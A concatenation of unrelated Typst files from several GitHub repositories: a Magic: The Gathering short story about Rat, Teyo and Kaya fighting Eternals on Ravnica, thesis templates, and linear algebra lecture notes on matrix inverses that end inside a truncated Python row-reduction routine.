- Vokseli sa teksturama nisu vokseli, no ovo je temelj za povezivanje drugih podataka (boje u praktičnom dijelu, occlusion, normale, ...)
== GPU streaming
Opisati kako LOD funkcionira za svijet sastavljen od chunkova.
== Metode optimizacije
@ackoTeardownFrame
#pagebreak()
|
|
https://github.com/polarkac/MTG-Stories | https://raw.githubusercontent.com/polarkac/MTG-Stories/master/stories/038%20-%20War%20of%20the%20Spark/002_The%20Path%20to%20Opulent.typ | typst | #import "@local/mtgstory:0.2.0": conf
#show: doc => conf(
"The Path to Opulent",
set_name: "War of the Spark",
story_date: datetime(day: 15, month: 05, year: 2019),
author: "<NAME>",
doc
)
#align(center)[#strong[I.]]
Hekara was dead.
That's all I knew.
It was lucky, I guess, that I was standing between Teyo and Mistress Kaya, who were fending off the attacking Eternals. I don't think I could've fended off a housecat right then.
#emph[I don't think I would have bothered.]
My memories of the next few minutes aren't terribly clear. I think <NAME> said something about his Beacon summoning more of those Planeswalker types like him and Mistress Kaya and Mister Jura and Mister Beleren and Teyo. I guess there were Planeswalkers appearing all around us. I think one was a minotaur. I dunno.
#emph[Hekara was dead.]
She should have been a Planeswalker. A Planesdancer. I could picture that. Hekara somersaulting across the Multiverse, visiting different worlds, making them all smile. Drawing a little blood. Or, you know, a #emph[lot] of blood.
Plus, if she were a Planeswalker, she could've planeswalked out of the way of whatever killed her.
"How'd she die?" I asked. But only Teyo was paying any attention to me, and he didn't know.
And then something happened. I #emph[really ] hadn't been paying attention to anyone, but I think someone must have cast a spell. Teyo dropped his shield and covered his eyes.
That snapped me out of it. Had to. An Eternal was about to brain my new friend Teyo—my #emph[only] friend Teyo—with a hammer.
Furious, I leapt at it and stabbed it in the eyes. It tottered~then fell.
I was seething. I don't ever remember being this angry.
#emph[I was prime Gruul material now. My parents would be so proud.]
<NAME> said, "Not every Planeswalker is Gatewatch material, you know. And some are downright nasty."
And <NAME> answered, "You have to assume that nasty or not, most Planeswalkers won't be big fans of <NAME>. We need to split up. Spread out through the city. Save as many people as we can and rally every Planeswalker we find."
A bunch of 'em shouted, "Aye!"
Kaya turned to Teyo and me and said, "You two are damn useful. Come with me."
#v(0.35em)
#line(length: 100%, stroke: rgb(90%, 90%, 90%))
#v(0.35em)
#align(center)[#strong[II.]]
Teyo, bless him, was a natural follower. And I wasn't going to leave him alone to die like I had Hekara, so when #emph[he] followed Mistress Kaya's order to follow her, I followed him. I guess it was a good thing. The streets were dangerous enough that it almost took my mind off Hekara for a little while.
#emph[Almost.]
Mistress Kaya was trying to get to Orzhova to summon her guild into battle. But we were a long way from the Cathedral Opulent, and phalanxes and crops of the Dreadhorde were scouring the streets of Ravnica, #emph[killing] everyone they found. The saving grace was that, for whatever reason, the Eternals weren't entering any of the buildings. If folks stayed inside, they'd be safe.
#emph[For now, at least.]
So we crossed Ravnica, through streets, byways, and alleys, and we did a fair decent job of saving people as we went. And because we could tell them to find shelter and stay indoors, we didn't have to worry too much about them afterward. And we never had to chase any Eternals inside ourselves. Which was good, 'cuz fighting in the open was leastways a #emph[bit] safer than taking on these creatures in close quarters.
I mean there were only three of us and Teyo's thing with those light shields was pretty much only defensive.
#emph[Don't get me wrong. We needed him.]
He had our backs, our fronts, our sides. But I don't think he actually killed a single Eternal.
"You've never killed anyone or anything in your life, have you?" I asked him.
"I killed a spider once."
"A giant spider?"
"How giant is giant?"
"Was it bigger than your thumb?"
"No."
"Then just a regular spider."
"Right. Just a regular spider."
I think he thought I was disappointed in him, then. But I think a part of me was glad he was so~what's the word?
#emph[Pure. Yeah. So pure.]
He was already insecure, and I didn't want to add to that. So I decided then and there to kinda put Hekara in my pocket for the time being. We had Eternals to deal with, and he needed me now. I'd mourn later.
#emph[I'd mourn forever.]
"I'm glad you're not a killer," I said.
"Uh~thanks. It's never really come up before now."
Anyway, we tried to avoid the larger contingents, but we did great against individual Eternals or small crops of 'em. Mistress Kaya did the heavy lifting, so to speak. The creatures seemed particularly vulnerable to her ghost daggers. And they couldn't touch her when she was incorporeal. But they could still #emph[see] her, and that made her and Teyo—with his big glowing white shields—good distractions for me. 'Cuz really, none of the Eternals paid me much mind unless I was already killing 'em.
#figure(image("002_The Path to Opulent/01.jpg", width: 100%), caption: [Kaya's Ghostform | Art by: <NAME>], supplement: none, numbering: none)
I'd duck out from behind one of Teyo's diamond-shaped shields, dodge two or three Eternals and then stab one that hadn't seen me coming, usually plunging both daggers into its eyes and deep into its brain. Then I'd be gone before it hit the ground.
Between a couple of these skirmishes, as we crossed a wide but empty street—empty of everything except a handful of corpses that proved Eternals had already been this way— Teyo turned to Kaya and asked, "So are we Gatewatch now?"
"I don't know," she replied. "Never heard of 'Gatewatch' before today. Not entirely clear what it is."
I said, "The good guys, I think."
Teyo nodded. "Ravnica's equivalent to the Shieldmage Order."
Kaya shook her head. "I don't think they're limited to Ravnica. All the members are Planeswalkers. Perhaps they're the Multiverse's equivalent of your Order."
I shrugged. "So~the good guys."
"Yes."
"Then I think both of you #emph[are ] Gatewatch," I said. "Not me, of course. I'm not a 'walker." I laughed then, as a thought struck my Rat brain: #emph[I'm not Gatewatch; I'm Gateless. That's the Rat. Always Gateless.]
"You've killed more Eternals than I have," Teyo said. I tried not to roll my eyes, since he hadn't killed any.
Instead I said, "That's such a sweet thing to say, Teyo. You're such a sweet boy. Isn't he a sweet boy, <NAME>?"
"Very sweet."
He glared at me a bit and said, "I'm pretty sure I'm older than you."
I ignored him, telling Mistress Kaya, "That's why I adopted him first thing." He started to protest or something, but I cut him off. "How's that cut? I can't see a scar."
Thrown a bit, he rubbed his head where the cut used to be. "Fine, I guess. I can't feel it at all."
"It was nice of <NAME> to heal it for you. It's not like he wasn't busy with other things, what with all the Eternals he was killing left and right. Wasn't it nice of M<NAME>, Mistress Kaya?"
"Very nice," she said.
By now, we could see the spiky spires of the Cathedral Opulent looming above closer, shorter buildings. Suddenly, Mistress Kaya took off down an alley running diagonally between two buildings. It seemed a strange choice, but I figured she knew what she was doing, so I grabbed Teyo's hand, and we followed.
About a hundred yards in I realized she was just looking up toward the cathedral, taking the most direct route. I groaned internally and said, "I don't think we want to go this way."
"We do," she replied, "if it'll get us to Orzhova faster."
"It's a dead end."
She stopped short and turned to face me. "You might have mentioned that sooner."
"You looked so confident. I thought maybe you knew about a secret passage. I mean there are a lot of secret passages through Ravnica. #emph[A lot.] And I pretty much know all of them—or most of them, anyway. But I figured that Guildmaster Kaya might know one or two I don't, right?"
"Rat, I've been guildmaster for a matter of weeks. I've only been on Ravnica for a matter of months. I barely know this city any better than Teyo here."
"I only arrived this morning," Teyo said rather needlessly.
"I know that," Mistress Kaya growled.
I nodded to her. "Right, right. So from now on, the native navigates. This way."
Still holding Teyo's hand—#emph[I'm not sure why, I think I just liked holding it] —I pulled him back the way we came. He let himself be dragged behind me. Mistress Kaya followed us.
I heard them coming before I saw them.
#figure(image("002_The Path to Opulent/02.jpg", width: 100%), caption: [Relentless Advance | Art by: <NAME>], supplement: none, numbering: none)
"Okay," I said, "maybe back the other way."
"Why?" she asked. But a split second later she knew. Another crop of Eternals had entered the mouth of the alley. Too many for us to fight in this enclosed space. The minute they spotted us, they charged. We turned and ran.
Mistress Kaya shouted, "You said this was a dead end!"
"It is!"
"Then where are we running to?"
"There's a door to a speakeasy at the end of the alley. It won't get us to the cathedral, but if we get inside maybe the creepies will forget about us.
#emph[It's as good a solution as any.]
The Eternals were fast, but they weren't running for their lives. We beat them pretty handily to the end of the alley and the heavy iron door to Krumnen's. Finally letting go of Teyo, I tried the handle. It was locked.
#emph[Of course. Why would it be open in daylight?]
I banged on the door with both fists. No answer. I knelt and said, "It's okay. I can pick the lock."
"So can I," Kaya said, "but I don't think there's time."
"I'll buy the time," Teyo stated. I glanced over my shoulder and saw him chant up a largish diamond shield of white light, separating us from the Eternals just a second or two before they smashed right into it. He grunted painfully but managed to maintain the shield, even expand it into a rectangle that spanned the width of the alleyway so that none of the creatures could slip around it.
"I didn't know you could do that," I said, while working the lock.
"Neither did I. Never done it before. But I can use the alley walls to substitute for the geometry. It's like leaning in."
"If you say so."
I could hear the weapons of the Eternals slamming against his shield, hear him chanting under his breath and hear him grunt a little in response to every blow. I didn't know how long he'd be able to keep this up.
Something clicked softly. "Got it," I said, standing. I grabbed the door handle, but it still wouldn't budge. "It's unlocked! Must be bolted from the inside!"
Mistress Kaya said, "Leave it to me," and ghosted through the door. She wasn't gone long before her head ghosted back through, and she said, "I'll get it open, but you need to hold out a bit longer."
I looked back at Teyo. He said nothing. But his eyes squinched shut and he nodded once. He was no longer chanting. Just gritting his teeth and leaning toward his shield with both hands, as a lazotep minotaur headbutted it over and over, while the rest of the Eternals smashed maces against it or the butts of their sickle-shaped swords. White light flashed at every impact. The shield wasn't going to hold.
Mistress Kaya must have had the same thought. She ghosted her body back into the alley and drew her daggers, ready to fight.
Fortunately, help came. Once again, I heard the newcomers before I saw them. Heard them whooping and hooting. I smiled and put a hand on Teyo's shoulder. "Just a few more seconds. It'll be all right."
Gruul warriors—<NAME>, <NAME>, <NAME>, <NAME>, Sheeza and Jahdeera, Bombop, and others—attacked the Eternals from behind, axes chopping through lazotep. Tusks piercing. Hammers raining down. <NAME> smashed two Eternal heads together with enough force to shatter their skulls into lazotep and bone fragments.
The Eternals instantly forgot about us and turned to face the Gruul. Teyo slumped, dropping his shield. I stood over him protectively with my daggers out, while Mistress Kaya began attacking the creepies from behind.
Domri cut off an Eternal's head with his long, weighted scythe. He glanced over and cackled out, "You must be Guildmaster Kaya, the almighty ghost-assassin. Lucky for you, <NAME> was here, enjoying the bloody chaos!"
"You're Rade?" Mistress Kaya asked.
I had to suppress a giggle, as Domri looked instantly insulted: "'Course I'm Rade! Who else?"
Domri had always been a dumb little twit. I still couldn't believe he had replaced a fine warrior like Borborygmos as Gruul's new guildmaster. And I really couldn't believe <NAME> was following him. On the other hand, I was glad Domri had led everyone here when he had.
So was Mistress Kaya. "I'm grateful," she said begrudgingly.
"Damn right you are!" he said, quite pleased with himself. By this time, most of the Eternals were in pieces on the ground. Domri snorted and shouted to his warriors, "Okay, mates, fun's over here. Let's find us some more!"
The Gruul started to follow him back up the alley, <NAME> taking up the rear. Unfortunately, one of the Eternals wasn't quite dead enough. It was missing an arm, but that didn't seem to trouble it much, and it leapt to its feet with a sword in its remaining hand, prepared to stab <NAME> in the back.
Teyo reacted even before I did, reaching out a hand and launching a small but solid sphere of white light at the back of the creature's head. It impacted hard, and the Eternal stumbled briefly, making just enough noise to alert Gan Shokta to the danger. He turned in time to see Teyo hit the creepy with another sphere.
Then Mistress Kaya was on the thing, stabbing up into its guts with both her knives. The Eternal was dying—but didn't seem to know it yet. It was still swinging its sword at Gan Shokta.
So I jumped on creepy's shoulders and stabbed my daggers down into its eyes and deep into its skull. It collapsed under me.
Gan Shokta~frowned. I knew he #emph[hated ] being saved by outsiders. With some reluctance, he grunted thanks to both Mistress Kaya and Teyo. Ignoring me, he turned and trotted off to catch up to Domri and the rest.
"Who was that?" Teyo asked.
I shrugged. "The big guy? That's <NAME>. My father."
#v(0.35em)
#line(length: 100%, stroke: rgb(90%, 90%, 90%))
#v(0.35em)
#align(center)[#strong[III.]]
So now we were traveling in packs, I guess.
Me and Teyo Verada and Mistress Kaya were now in the company of Gan Shokta, the ogres Govan and Bombop, Akamal, Sheeza and Jahdeera (the viashino twins), and a handful of other Gruul warriors, shamans, and druids all led by #emph[Master ] <NAME>.
We soon ran into a phalanx of Eternals, and midway through the fight, the enemy got all sandwiched between Simic on the left and Izzet on the right.
"Who are they?" Teyo asked.
I nodded left: "Those are Simic Combine forces. Terraformers, super-soldiers, and merfolk led by Biomancer Vorel." Then I nodded right: "And those are Izzet League mech-mages—that's Master Zarek's guild—led by his second-in-command, Chamberlain Maree."
"Which one's Maree?"
"The goblin."
"Okay."
"I'm gonna test you on all these names later."
He shot me a panicked look before he realized I was teasing him. Then he glared comically.
#emph[I think he likes it when I tease him, you know?]
We made short work of that phalanx, and now we were three guilds strong. But the pack just kept growing.
Another battle brought more help: Planeswalkers this time, a merfolk woman named Kiora from a world called Zendikar, and a young human woman named Samut from someplace called Amonkhet, which apparently was where all these Eternals originally came from.
"You couldn't just keep them there," I asked her, as sarcastically as I could.
She ignored the comment and me. I guess she was a little too busy fighting and mourning, mourning and fighting. She knew the names of every single Eternal she killed, knew them I guess from when they were her friends. (Watching her grief, it was hard not to think of Hekara.) She'd kill one and grimly state, "You are free, Eknet." Then she'd kill two more and say, "You are free, Temmet. You are free, Neit."
I wondered if Hekara showed up as a mindless, murderous Eternal whether I'd be able to kill her.
#emph[Or would it just be easier to let her kill me?]
When the battle ended, we continued on our way, surrounded by this teeming throng of allies.
Mistress Kaya was still trying to get us to Orzhova.
Teyo was staring at Kiora while trying desperately not to make it too obvious.
Shaking my head, I giggled.
"What?" he asked.
"You've never seen merfolk before?"
"We don't have much water on Gobakhan."
I laughed and pointed at one of the Izzet mech-mages. "You've never seen a vedalken?"
"I know people with black skin, brown skin, tawny skin, and tan skin, but I've never seen anyone with blue skin before."
Laughing some more, I nodded in Jahdeera's direction. "You've never seen a viashino?"
"Maybe some of our lizards grow up to be viashino?"
"Ever see a rat before?"
"I've seen many rats on Gobakhan. None like you."
I laughed again and punched him real gentle-like on the arm.
I stole a glance at <NAME>, who was marching just behind Domri and none too happy about it. My father was used to following Borborygmos, someone he could respect as a leader and a warrior. It clearly galled him to act as #emph[Master ] Rade's lieutenant, and he stared daggers at Domri's back. I wanted to reassure him that dumb Domri was an ass, who'd lose control of the Gruul soon enough. But I couldn't figure out a way to navigate that discussion right then. So I just sighed and continued walking between Teyo and Mistress Kaya.
Besides, we were in another fight soon enough.
We'd come up on a cobblestone-covered hill, where the Dreadhorde had the high ground.
Mister Vorel shouted a command: "Take them out! Take them all out!"
Chamberlain Maree looked ready to tell Mister Vorel what he could do with his orders, but <NAME> beat her to the punch with some choice Gruul cursing, which was all kinda pointless, 'cuz the next thing he did was run uphill, shouting, "C'mon, mates! We don't need these lab rats teaching us how to knock heads!"
I could read Chamberlain Maree easy enough. She decided she'd rather be Mister Vorel's ally than follow <NAME>'s example.
So it wasn't the most coordinated of attacks, but Gruul, Simic, and Izzet still stormed the hill together, which was some limited pan-guild progress, I guess.
Of course, we went with 'em: me and Teyo and <NAME> and <NAME>. I looked around for <NAME>, but she was already ahead of the pack, calling out, "You are free, Haq. You are free, Kawit."
Just as Teyo and I reached the summit, two more women materialized within arm's reach of us. Both Planeswalkers had warm brown skin, but otherwise <NAME> and <NAME> (I learned their names later) couldn't have looked less alike. <NAME> was armored and armed, with a long tightly braided black ponytail emerging from beneath her helm. She was short—almost as short as me—but powerfully muscled with searching eyes and a grim mouth. <NAME> wore a long swirling dress, decorated with shiny gold filigree. She was taller than even <NAME> and wore her hair in swirls atop her head, which made her seem taller still. She was lithe and graceful with curious eyes and a smiling mouth.
Different as they were, they were clearly friends. Attempting to size up the situation, they exchanged a quick glance but stood there doing nothing, a little unsure which side they should be on. Teyo more or less answered the unspoken question by throwing up a shield to block an Eternal axe that might otherwise have split Miss Rai's skull.
"Thank you," she said.
"Yes, my thanks," <NAME> echoed.
I had seen enough, so I scurried past them both to get to the fighting. I killed one Eternal just as yet a #emph[third ] Planeswalker appeared. This one seemed to be somehow informed of the situation and immediately joined the battle, using her magic to take control of one of the creepies and setting it against all the others. She had long honey-blonde hair, a blue-white hooded cloak, and a long crook-staff. She told <NAME> that her name was <NAME> or <NAME> or <NAME> or something. (Okay, it wasn't Mistress Kasmagorica.)
#figure(image("002_The Path to Opulent/03.jpg", width: 100%), caption: [Kasmina's Transmutation | Art by: <NAME>], supplement: none, numbering: none)
#emph[But, yes, even] I#emph[ was having trouble remembering everyone's name by this time.]
I lost track of her soon after, but she did some decent damage with her enthralled Eternal right then and there.
So did <NAME>, who took to the killing of creepies quite well.
And that shiny little golden hummingbird that <NAME> released sped right through the forehead of one Eternal and emerged out the back of its skull. The Eternal staggered and dropped. I wanted to catch and keep that useful shiny, but the bird never slowed. It repeated its attack on another Eternal and another.

It wasn't all good news. Poor Bombop rushed in too far ahead of the rest of us. He crushed five or six lazotep skulls with his stone hammer, but the Eternals soon swarmed over him, dragging him down to stab him about thirty times before any of us could catch up to help him.
There was also a Simic shaman—I never did get her name—who took a moment too long to cast her spell and wound up beheaded. The fallen head managed to croak out the last few necessary syllables before expiring, and the creepy that killed her #emph[exploded] in a shower of lazotep and goop.
#emph[So, yeah. Setbacks, you know?]
But the battle was over soon enough. We'd won, and not a single Eternal remained alive—or even undead.
Our pack paused to catch our collective breaths—and then those breaths were stolen away at the sound of a remote but earsplitting #emph[CRACK!] We all turned, and from the top of that hard-won hill, we could see four immense Eternals emerging from the tear in the world to tower over the distant Tenth District Plaza.
I swallowed hard and muttered, "Whoa. Big."
Miss Samut cursed.
Mistress Kaya asked, "What are they?"
"They are our gods," <NAME> said bitterly. "But Bolas killed them or had them killed. Now they are his. His God-Eternals."
#emph[Well, sure. Of course. That's what the day was missing. GOD-Eternals.]
We watched in silence for a bit as the four God-Creepies tore apart what appeared to be Vitu-Ghazi, which was strange and horrific for all sorts of reasons, not the least of which was that I couldn't figure out how the World-Tree had gotten to the plaza from its home in Selesnyan territory in the first place.
I felt like crying again.
And then I felt like hitting <NAME> when he actually #emph[cheered] : "Woohoo! Ya see that! That was Vitu-Ghazi they trashed! Krokt, they taught those Selesnya droops a lesson!"
A couple of his party boys nodded or grunted their agreement, but the rest of us just stared at him, stunned.
He said, "Gruul, we're fighting on the wrong side! This dragon's shaking things up! He'll tear the guilds down! He'll tear Ravnica down! Isn't that what we've always wanted? When the guilds fall, chaos reigns, and when chaos reigns, the Gruul will rule! Ya hear? We're joining the dragon!"
I fought the urge to stab <NAME> in the eyes by looking to see what my father would do. <NAME> did not disappoint. He paused, glowering and then said, "Rade, you'd serve that master?"
"Partner, mate, not serve!"
"You don't know the difference, boy. You're no clan leader. You're a follower. I'm going back to Borborygmos."
<NAME> looked stunned. <NAME> scowled down at him, then turned and walked away. I watched him go, full of Gruul pride.
#emph[Well, it's been a Gruul kinda day for me.]
Teyo looked at me. It occurred to me that he thought <NAME> should have paid more attention to his daughter. I shrugged. Teyo's a good boy, but he didn't understand my family situation at all.
#emph[Which is totally understandable, 'cuz it's kinda odd, and I hadn't actually told him anything about it.]
I wasn't #emph[used ] to telling people about it, frankly, and I wasn't quite sure how I'd even go about it. But I figured he'd catch on eventually.
Anyway, <NAME> pouted for a second or two, before calling out, "Forget <NAME>. He's an old droop, too! This is our moment, ya see?"
Mistress Kaya said, "You're a fool, Rade. Bolas doesn't keep faith with those he #emph[chooses] to bargain with. Do you truly believe you can win his favor unbidden?"
But <NAME> ignored her, leading his warriors downhill toward the plaza, calling out, "Help's on the way, dragon! We'll knock 'em all down together!"
#figure(image("002_The Path to Opulent/04.jpg", width: 100%), caption: [Domri, Anarch of Bolas | Art by: Raymond Swanland], supplement: none, numbering: none)
Kaya looked angry enough to follow and drag him back, and I was angry enough to cut out his fool tongue.
But another crop of Eternals was coming up the other side of the hill. So, with a collective sigh, we all prepared for another fight.
#v(0.35em)
#line(length: 100%, stroke: rgb(90%, 90%, 90%))
#v(0.35em)
#align(center)[#strong[IV.]]
I couldn't hear the words—they were meant for Planeswalkers, not for anyone like me—but I felt <NAME>'s mind-touch like a stone skipping across the liquid surface of my psyche.
But for Mistress Kaya, it was clearly more intense. Distracted—even a little pained—by whatever <NAME> had projected, she was nearly split in two by the axe of yet another Eternal minotaur before I pulled her out of the way.
"Did you hear that?" Teyo asked, confused.
"Hear what?" I prompted, while jumping on the minotaur's back and—unable to reach around its horns to stab it through the eye sockets—plunging my two little daggers into its neck.
We were still amid the pack. The Gruul were gone. Some had followed <NAME>. Some had followed my father. But the Simic and Izzet fighters were still with us, as were Miss Samut, Miss Kiora, Miss Rai, and Miss Huatli.
My attack on the bull-headed Eternal did little damage, but it got the creepy's attention off Mistress Kaya, which was my main goal anyway. I jumped off and scurried away behind one of Teyo's shields.
The confused minotaur looked around for, well~me. It gave Mistress Kaya time to recover and use her own spectral daggers to send that Eternal to its eternal rest.
Suddenly, another Planeswalker—a large viashino with lime-green skin—materialized right in front of us.
He had just enough time to hiss, "What izzzz thissss?" before a female Eternal grabbed him from behind. The Eternal used no weapon on the lizard-man, but what followed was pure horror show: the creepy seemed to draw the viashino's life force right out of his back, like an Izzet fan sucking up a flame. She absorbed that fire until it glowed from within her lazotep body, glowed brightly enough to create—or at least highlight—cracks in her lazotep shell.
The viashino fell, a lifeless husk, as the Eternal burst into flames from the inside out. Then that fire rocketed into the air, shooting like a comet toward Tenth District Plaza and the dragon. The burned-out Eternal collapsed atop the dead lizard, as if they had been lovers, dying together in a final embrace.
We were lucky <NAME> was already killing the last creepy of this particular crop, because everyone else just stood there in total shock.
Just then, I felt <NAME>'s mind-touch again. I looked toward a grimacing Teyo, who read my questioning eyes and said, "It was Beleren of the Gatewatch. He said, 'Retreat. We need a plan. Contact every Planeswalker and guildmaster you can find. Meet us at the Azorius Senate. Now.'"
#emph[I guess we have new orders] ~
|
|
https://github.com/xkevio/parcio-typst | https://raw.githubusercontent.com/xkevio/parcio-typst/main/parcio-thesis/appendix.typ | typst | MIT License | #counter(heading).update(0)
#heading(numbering: "A.", supplement: "Appendix")[Appendix]<appendix>
#figure(
caption: "Caption",
numbering: n => numbering("A.1", counter(heading).get().first(), n))[
```c
printf("Hello World!\n");
// Comment
for (int i = 0; i < m; i++) {
for (int j = 0; j < n; j++) {
sum += 'a';
}
}
```
] |
https://github.com/Karolinskis/KTU-typst | https://raw.githubusercontent.com/Karolinskis/KTU-typst/main/main.typ | typst | #set text(font: "Times New Roman")
#import "variables.typ": *
#include "mainPages/TitlePage.typ"
#include "mainPages/SecondPage.typ"
#include "mainPages/ThirdPage.typ"
#include "mainPages/PageSummaryLT.typ"
#include "mainPages/PageSummaryEN.typ"
#include "mainPages/TableOfContents.typ"
#include "mainPages/TableList.typ"
#include "mainPages/ImageList.typ"
#include "mainPages/TermsList.typ"
#set heading(numbering: "1.1")
#include "sections/testtext.typ" |
|
https://github.com/yonatanmgr/university-notes | https://raw.githubusercontent.com/yonatanmgr/university-notes/main/0366-%5BMath%5D/03661111-%5BLinear%20Algebra%201A%5D/src/lectures/03661111_lecture_14.typ | typst | #import "/template.typ": *
#import "@preview/colorful-boxes:1.2.0": *
#show: project.with(
title: "אלגברה לינארית 1א׳ - שיעור 14",
authors: ("<NAME>",),
date: "20 בפברואר, 2024",
)
#set enum(numbering: "(1.a)")
= Matrix Inversion
We have met the transposed matrix: $trs(A_(i j)) = A_(j i)$.
==== Why is it useful?
Let $A in M_(m xx n) (F)$ and define a linear map $S_A : F^m -> F^n$ as follows:
$ forall x in F^m: S_A (x) = x dot A = mat(x_1, x_2, dots, x_m) mat(-, R_1, -;-, R_2, -;, dots.v,;-, R_m, -) = sum_(i=1)^m x_i R_i $
What is the representing matrix with respect to the standard bases?
$ [S_A]_E^E = mat(|,|,,|;[S_A (e_1)]_E,[S_A (e_2)]_E, dots.h.c,[S_A (e_m)]_E;|,|,,|) = mat(|,|,,|;R_1,R_2, dots.h.c,R_m;|,|,,|) = trs(A) $
== Invertibility of a Matrix
A matrix $A in M_n (F)$ is called:
- *right-invertible* if there exists $B in M_n (F)$ such that $A dot B=I_n$.
- *left-invertible* if there exists $C in M_n (F)$ such that $C dot A=I_n$.
- *invertible* if there exists $D in M_n (F)$ such that $A dot D = D dot A = I_n$, in which case we write $D = inv(A)$.
=== (Claim) If $A$ is both right- and left-invertible, then $A$ is invertible, and the right and left inverses coincide.
==== Proof
Suppose $A B = C A = I_n$. We show that $B = C$, and from this conclude that $A$ is invertible with $inv(A) = B = C$.
Indeed, $B = I_n dot B = (C A) dot B = C dot (A B) = C dot I_n = C$, as required. #QED
==== Corollary: the inverse matrix is unique.
=== Examples
+ $ A = mat(1,2;3,5), space inv(A) = mat(-5,2;3,-1) $ $ A dot inv(A) = mat(1,2;3,5) mat(-5,2;3,-1) = mat(1,0;0,1) = I_n wide inv(A) dot A = mat(-5,2;3,-1) mat(1,2;3,5) = mat(1,0;0,1) = I_n $
+ $ A = mat(1,2;0,0), space A dot B_(2 xx 2) = mat(1,2;0,0) dot B = mat(square,square;0,0) != I_2 ==> A "is not invertible" $
==== Remark: matrices with a row or column of zeros are not invertible.
#pagebreak()
=== (Claim) Let $A in M_n (F)$. The following conditions are equivalent: <c>
+ $A$ is invertible.
+ If $A$ is a representing matrix of a linear map $T$, then $T$ is an isomorphism.
+ There exists an isomorphism whose representing matrix is $A$.
==== Proof
+ $arrl$ (2): there exists $B in M_n (F)$ such that $A B = B A = I_n$, and $T: U->W$ is a linear map, where $C,D$ are bases of $U,W$ respectively, both of dimension $n$, such that $A=[T]_D^C$.
Let $u in ker T$. We get $0= [T u]_D = [T]^C_D dot [u]_C = A dot [u]_C$. \ Hence $[u]_C = I_n dot [u]_C = B dot A dot [u]_C =0$, so $ker T = {0}$, $T$ is injective, and in particular an isomorphism.
+ $arrl$ (3): recall that $A=[T_A]_E^E$, and from (2) we deduce that there exists an isomorphism represented by $A$.
+ $arrl$ (1): let $T: U->W$ be an isomorphism with $dim U = dim W = n$, and let $C,D$ be bases of $U,W$ such that $A=[T]_D^C$.
Now $I_n = [I_U]_C^C = [inv(T) of T]_C^C = [inv(T)]_C^D dot [T]_D^C$, and also $I_n = [I_W]_D^D = [T of inv(T)]_D^D = [T]_D^C dot [inv(T)]_C^D $.
That is, $inv(A) = [inv(T)]_C^D$.
#QED
=== (Theorem) Let $A in M_n (F)$. Then: <a>
+ If there exists $B in M_n (F)$ such that $A B = I_n$, then $A$ is invertible with $inv(A)=B$.
+ If there exists $B in M_n (F)$ such that $B A = I_n$, then $A$ is invertible with $inv(A)=B$.
==== Proof
Recall that $A = [T_A]^E_E$ where $T_A: F^n -> F^n$, so if $T_A$ is injective or surjective it is an isomorphism and, by @c, $A$ is invertible.
+ If $A B = I_n$, then for every $x in F^n$ we have $x = I_n dot x = A dot (B x)$, i.e. $Im(T_A)=F^n$, so $T_A$ is surjective and hence an isomorphism, as desired.
+ If $B A = I_n$ and we take $x in ker T_A$, then $T_A (x) = 0 = A dot x$. That is: $ x = I_n dot x = (B A) dot x = B dot (A x) = B dot 0 = 0 $ and indeed $ker T_A = {0}$, so $T_A$ is injective and an isomorphism.
#QED
=== Properties of the inverse matrix <b>
+ If $A in M_n (F)$ is invertible, then so is $inv(A)$, with $inv((inv(A))) = A$.
+ If $A in M_n (F)$ is invertible, then so is $trs(A)$, with $inv((trs(A))) = trs((inv(A)))$.
+ If $A, B in M_n (F)$ are invertible, then so is $A dot B$, with $inv((A B)) = inv(B) dot inv(A)$. \ More generally, if $A_1, dots, A_m in M_n (F)$ are invertible, then $A_1 dot dots dot A_m$ is invertible with: $ inv((A_1 dot dots dot A_m)) = inv(A_m) dot dots dot inv(A_1) $
==== Proof
+ $A dot inv(A) = I_n$, so $A$ is a left inverse of $inv(A)$, and by @a, $inv((inv(A))) = A$.
+ $A dot inv(A) = I_n$, hence: $trs((inv(A))) dot trs(A) = trs((A dot inv(A))) = trs(I_n) = I_n $ so $trs((inv(A)))$ is a left inverse of $trs(A)$, and we conclude from @a that $inv((trs(A))) = trs((inv(A)))$.
+ $B dot inv(B) = A dot inv(A) = I_n$. We compute: $(A B)(inv(B) dot inv(A)) = A dot (B dot inv(B)) dot inv(A) = A dot inv(A) = I_n$. So $inv(B) inv(A)$ is a right inverse of $A B$, and we conclude $inv((A B)) = inv(B) dot inv(A)$.
#QED
#pagebreak()
=== (Claim) Let $A in M_n (F)$. Then $A$ is invertible if and only if, for every $b in F^n$, the system $A x = b$ has a unique solution.
==== Proof
- $arrow.double.r$: Suppose $A$ is invertible and consider the system $A x = b$. Multiplying on the left by $inv(A)$ gives $x = inv(A) A x = inv(A) b$, so the system has the unique solution $x = inv(A) b$.
- $arrow.double.l$: We look for $B in M_n (F)$ such that $A dot B = I_n$. That is: $ A dot underbrace(mat(|, |, , |; c_1, c_2, dots.h.c, c_n; |,|,,|), B) = mat(|, |, , |; A c_1, A c_2, dots.h.c, A c_n; |,|,,|) = underbrace(mat(|, |, , |; e_1, e_2, dots.h.c, e_n; |,|,,|), I_n) $
We obtain $n$ systems of linear equations: $A c_1 = e_1, A c_2 = e_2, dots, A c_n = e_n$. By assumption, each of these systems has a unique solution, and these solutions make up the matrix $B$; by @a, since $B$ is a right inverse of $A$, $A$ is invertible.
#QED
==== Corollary
To find the inverse matrix $B=mat(|, |, , |; c_1, c_2, dots.h.c, c_n; |,|,,|)$ we must solve $n$ systems of equations, all with the same coefficient matrix $A$. \ We row-reduce all of the systems in parallel:
$ mat(space,|,|,,|;A space, space e_1,e_2, dots.h.c, e_n; space, |,|,,|;augment:#1) arrow.long.squiggly_"reduce to canonical form" mat(space,|,|,,|;I_n space, space c_1,c_2, dots.h.c, c_n; space, |,|,,|;augment:#1) $
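This parallel reduction is easy to mechanize. The following Python sketch (not part of the lecture; it uses exact rational arithmetic from the standard `fractions` module so the small examples come out exactly) row-reduces the augmented matrix and reads off the inverse, raising an error when no pivot exists:

```python
from fractions import Fraction

def inverse(a):
    """Invert an n x n matrix by row-reducing [A | I_n] to [I_n | inverse]."""
    n = len(a)
    # Build the augmented matrix [A | I_n] with exact rational entries.
    m = [[Fraction(x) for x in row] + [Fraction(i == j) for j in range(n)]
         for i, row in enumerate(a)]
    for col in range(n):
        # Find a pivot in this column; if none exists, A is not invertible.
        pivot = next((r for r in range(col, n) if m[r][col] != 0), None)
        if pivot is None:
            raise ValueError("matrix is not invertible")
        m[col], m[pivot] = m[pivot], m[col]
        m[col] = [x / m[col][col] for x in m[col]]   # scale pivot row to 1
        for r in range(n):                            # eliminate the column
            if r != col and m[r][col] != 0:
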